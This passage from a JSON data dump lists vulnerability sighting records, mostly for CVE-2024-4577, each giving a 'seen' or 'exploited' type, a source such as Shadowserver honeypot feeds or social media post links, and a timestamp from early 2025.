"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "5109b84f-a2dc-4f39-9737-7d1b6dcd9af7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3ljrw6j7yu723", "content": "", "creation_timestamp": "2025-03-07T11:36:36.650485Z"}, {"uuid": "71c5b353-66a1-4d28-84dd-b92ef549034f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-07)", "content": "", "creation_timestamp": "2025-02-07T00:00:00.000000Z"}, {"uuid": "2089d240-bf4f-4e94-b84e-98cbdf0b25ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/newsfordemocrats.bsky.social/post/3lkc4onwzgc23", "content": "", "creation_timestamp": "2025-03-13T22:15:44.272706Z"}, {"uuid": "d7e27adb-c7b2-4b5a-a854-abd9e2a41701", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "3fab95cf-79de-4f43-8f5c-622f4231cf54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-05)", "content": "", "creation_timestamp": "2025-03-05T00:00:00.000000Z"}, {"uuid": "ed7a3df3-e117-41c4-82b4-316cbd26eee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-08)", "content": "", "creation_timestamp": "2025-02-08T00:00:00.000000Z"}, {"uuid": "d1776b2d-a76b-487e-9e72-6146c00f9446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/tuxcare.bsky.social/post/3lkeagwpek22c", "content": "", "creation_timestamp": "2025-03-14T18:28:12.557415Z"}, {"uuid": "fe754d24-5bc6-47dd-8940-efe7d19c369a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "c90a3d22-560c-4b3b-b3fd-7b9b8bc8484c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3lk2jqmq2po2o", "content": "", "creation_timestamp": "2025-03-10T21:48:04.131566Z"}, {"uuid": "5ffc80f5-017b-40ed-afc4-bc885b129446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/tweekfawkes.bsky.social/post/3lky2o34u7526", "content": "", "creation_timestamp": "2025-03-22T15:38:04.403987Z"}, {"uuid": "c81c2a07-6090-4d72-8a07-4eacd2473b69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-23)", "content": "", "creation_timestamp": "2025-03-23T00:00:00.000000Z"}, {"uuid": "7a6f5b52-8f55-46fd-a483-b7645f8fde6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-27)", "content": "", "creation_timestamp": "2025-02-27T00:00:00.000000Z"}, {"uuid": "1725c103-a612-44fb-b19b-9434e35c9aae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-08)", "content": "", "creation_timestamp": "2025-03-08T00:00:00.000000Z"}, {"uuid": "2e4ff873-dd82-4080-9fb4-5a1002c912f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/youranonriots.bsky.social/post/3lkr5iugjcs2p", "content": "", "creation_timestamp": "2025-03-19T21:40:12.673902Z"}, {"uuid": "6a0e2c49-0113-457f-bebb-be8b13b8ae7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/114132077008919966", "content": "", "creation_timestamp": "2025-03-09T10:48:08.665428Z"}, {"uuid": "9d7e4940-0687-44fb-960e-1c92cf3eae4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-03)", "content": "", "creation_timestamp": "2025-03-03T00:00:00.000000Z"}, {"uuid": "c309aaea-2a07-4d72-9b47-49aba3478498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://infosec.exchange/users/threatcodex/statuses/114141051291439814", "content": "", "creation_timestamp": "2025-03-11T00:50:25.492558Z"}, {"uuid": "a11bfe83-af50-4c54-b8d3-c9e6e65dcfe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/3714e52f-0f9a-5bbd-a430-7051c621dd44", "content": "", "creation_timestamp": "2025-03-25T21:36:52.000000Z"}, {"uuid": "d3e8d78e-0d99-4a7e-b07e-ca087e31450b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/aimainainnu.bsky.social/post/3lk2wnzepjk2x", "content": "", "creation_timestamp": "2025-03-11T01:39:29.267101Z"}, {"uuid": "48a72675-7f6b-49d4-83ec-81c40dbabd2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "66ebb769-3b14-43fa-a64a-8c29101dd257", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4577", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk2xetuc3c27", "content": "", "creation_timestamp": "2025-03-11T01:52:00.578370Z"}, {"uuid": "e9a52203-6def-4cff-989c-766f45fac2db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://threatintel.cc/2025/03/12/critical-php-rce-vulnerability-mass.html", "content": "", "creation_timestamp": "2025-03-12T10:57:30.000000Z"}, {"uuid": "98592814-73b5-4111-bb13-0572171c2087", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:04.000000Z"}, {"uuid": "4c4573ce-9472-4f97-a5c7-23f9c442591c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/greynoise.infosec.exchange.ap.brid.gy/post/3ljssqmtpu2y2", "content": "", "creation_timestamp": "2025-03-07T20:07:58.508616Z"}, {"uuid": "945e04dd-65e4-48d4-a091-1df2f8f9b126", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/greynoise.io/post/3ljssr6gqzc2e", "content": "", "creation_timestamp": "2025-03-07T20:08:09.968175Z"}, {"uuid": "3cc260a0-1b81-4e4e-825b-7d6baac8181c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114099140291395742", "content": "", "creation_timestamp": "2025-03-03T15:11:54.690427Z"}, {"uuid": "5279bd6b-b41f-4ba9-a227-f79406d50327", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lk53z45f7326", "content": "", "creation_timestamp": "2025-03-11T22:20:15.840086Z"}, {"uuid": "15936467-8ffd-4760-8c1e-b2e1abf1d002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3ljsyaehrgt2l", "content": "", "creation_timestamp": "2025-03-07T21:46:06.322586Z"}, {"uuid": "84caffbf-ee6a-421b-970e-ba7da87fc1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-04)", "content": "", "creation_timestamp": "2025-03-04T00:00:00.000000Z"}, {"uuid": "ab573b05-fc51-4713-a1de-ca40e33be22f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/martinzugec.bsky.social/post/3lklyfkitkc2k", "content": "", "creation_timestamp": "2025-03-17T20:25:35.466751Z"}, {"uuid": "35265ebb-6eda-4b3a-8a4b-b6cbbe7a925e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3ljyarkcqsk2q", "content": "", "creation_timestamp": "2025-03-10T00:02:14.988868Z"}, {"uuid": "0fc10eb9-5e72-4f68-8ace-ecf9e6c3683b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-11)", "content": "", "creation_timestamp": "2025-02-11T00:00:00.000000Z"}, {"uuid": "b524fb01-4202-4787-aec7-a97c7b318792", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/royans.bsky.social/post/3lk3auppxt62y", "content": "", "creation_timestamp": "2025-03-11T04:41:56.971288Z"}, {"uuid": "b81a4fca-ff12-4902-8883-443af2f93fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lk3bwokx4k2n", "content": "", "creation_timestamp": "2025-03-11T05:00:59.697694Z"}, {"uuid": "8cd81dc8-546b-48cb-9640-023c671561bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ljt4nrs6rs2q", "content": "", "creation_timestamp": "2025-03-07T23:05:14.386166Z"}, {"uuid": "18cd3c5d-dcc2-470a-93bf-576e138a1425", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lk3dks4vbr2h", "content": "", "creation_timestamp": "2025-03-11T05:30:05.433047Z"}, {"uuid": "7cb34539-dcbd-4689-8ace-4967dbbf063f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3lkm72ccrce2j", "content": "", "creation_timestamp": "2025-03-17T22:24:31.797727Z"}, {"uuid": "12f4d396-0646-4720-a919-bf9c4d22f500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "8b7d0cc9-85d0-40f9-8997-989c122105d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-26)", "content": "", "creation_timestamp": "2025-03-26T00:00:00.000000Z"}, {"uuid": "dd834163-5d42-4c9c-823b-5bd37d8fac76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lksx7ilcnc2x", "content": "", "creation_timestamp": "2025-03-20T14:52:54.815489Z"}, {"uuid": "33172a02-351f-495f-8f7e-ae0ac3862b4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-12)", "content": "", "creation_timestamp": "2025-02-12T00:00:00.000000Z"}, {"uuid": "6e5a4220-e877-4982-a76a-1c7552f0af43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "6afc67b3-7335-4f99-9260-f33c1a2733a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "25393353-9b05-4a33-8d06-2c5095305d7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/mbissey.bsky.social/post/3lkt36pawjr2q", "content": "", "creation_timestamp": "2025-03-20T16:04:03.387120Z"}, {"uuid": "94f63118-76f4-4375-9c45-337d14ed224c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "087aa3be-4068-4046-a6b7-581e8c6af5a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/virusbtn.bsky.social/post/3lkpymhkoek24", "content": "", "creation_timestamp": "2025-03-19T10:40:07.234650Z"}, {"uuid": "e68678e0-584b-4814-9e32-e7baed021b88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-13)", "content": "", "creation_timestamp": "2025-02-13T00:00:00.000000Z"}, {"uuid": "e098d497-4fa7-4888-ae04-c22b7b50c1a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-14)", "content": "", "creation_timestamp": "2025-02-14T00:00:00.000000Z"}, {"uuid": "a80670a1-8d78-44d4-bc66-69d3a0597fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "c6d20e7e-011e-4b98-9522-e4ffad8baa61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-13)", "content": "", "creation_timestamp": "2025-03-13T00:00:00.000000Z"}, {"uuid": "38f0d2d9-d64c-4917-87ca-949094d81767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-10)", "content": "", "creation_timestamp": "2025-03-10T00:00:00.000000Z"}, {"uuid": "b77616ee-800e-4945-8f3d-50a85f77fa44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "7647d6c0-ad81-4016-8f1c-ced8f08fa8e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4577", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkn6nrgnsdb2", "content": "", "creation_timestamp": "2025-03-18T08:00:00.221243Z"}, {"uuid": "a3b93dc0-d7d9-40f0-89e9-ff2073ab9c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "e00ec58f-0e1c-48f6-8e5b-3fd2fccaeb4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-16)", "content": "", "creation_timestamp": "2025-03-16T00:00:00.000000Z"}, {"uuid": "1dbb5ef5-8859-4e39-9c76-a582692b7c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lk63ck6zdy2g", "content": "", "creation_timestamp": "2025-03-12T07:40:17.528815Z"}, {"uuid": "496c935a-b76d-43b3-9b5e-413fe568ea18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-16)", "content": "", "creation_timestamp": "2025-02-16T00:00:00.000000Z"}, {"uuid": "b525d27d-ef0f-4f2a-a55e-04fc0fc7bbf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3ljra6nj37z23", "content": "", "creation_timestamp": "2025-03-07T05:02:58.549198Z"}, {"uuid": "788d6d35-f185-4b98-9b92-e22c315627a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "aee21553-9f5f-4e81-b8e2-28ecdda68dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3ljraxcux2g2z", "content": "", "creation_timestamp": "2025-03-07T05:16:47.034064Z"}, {"uuid": "a279f725-80b6-4d17-a4e0-14c2006843c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-07)", "content": "", "creation_timestamp": "2025-03-07T00:00:00.000000Z"}, {"uuid": "8d245b0f-4340-4e02-bfc2-0013144ef6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/shoebhakim.bsky.social/post/3ljrbhelwz72v", "content": "", "creation_timestamp": "2025-03-07T05:25:45.173281Z"}, {"uuid": "0a1c2b40-a0ff-4776-bf27-161957383643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lihxwivd542o", "content": "", "creation_timestamp": "2025-02-18T19:16:06.234003Z"}, {"uuid": "6042cf65-7d26-4ef6-8d90-3be01dea669b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45775", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lii3bmnrcv2k", "content": "", "creation_timestamp": "2025-02-18T20:16:00.524633Z"}, {"uuid": "f28eb538-f831-455c-9827-fadf811ae09e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45776", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lii3bpavfo2p", "content": "", "creation_timestamp": "2025-02-18T20:16:03.145470Z"}, {"uuid": "5bf7a7ac-305c-430b-a689-a613981f753d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3ljzk2zp5sv2x", "content": "", "creation_timestamp": "2025-03-10T12:21:13.349434Z"}, {"uuid": "76bd9b54-7d2f-44c3-92ac-ec11607019ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "209ddbc9-c4c8-4ef4-9966-b35883ce2d66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/lordman1982.bsky.social/post/3lk6d4sntk227", "content": "", "creation_timestamp": "2025-03-12T10:00:15.247873Z"}, {"uuid": "09b57a1b-e7a8-4077-8045-17ed7e2f526a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "5e876e5c-795d-42ff-96fa-a80458bb9fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45777", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3likrwtaabe2v", "content": "", "creation_timestamp": "2025-02-19T22:06:56.061877Z"}, {"uuid": "c14f4c50-b70e-42bd-8425-be140351975b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-19)", "content": "", "creation_timestamp": "2025-02-19T00:00:00.000000Z"}, {"uuid": "f95ebca0-c670-4e58-964c-f58d68555c94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "56d30b2d-09c6-4374-90dc-92befc9600ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 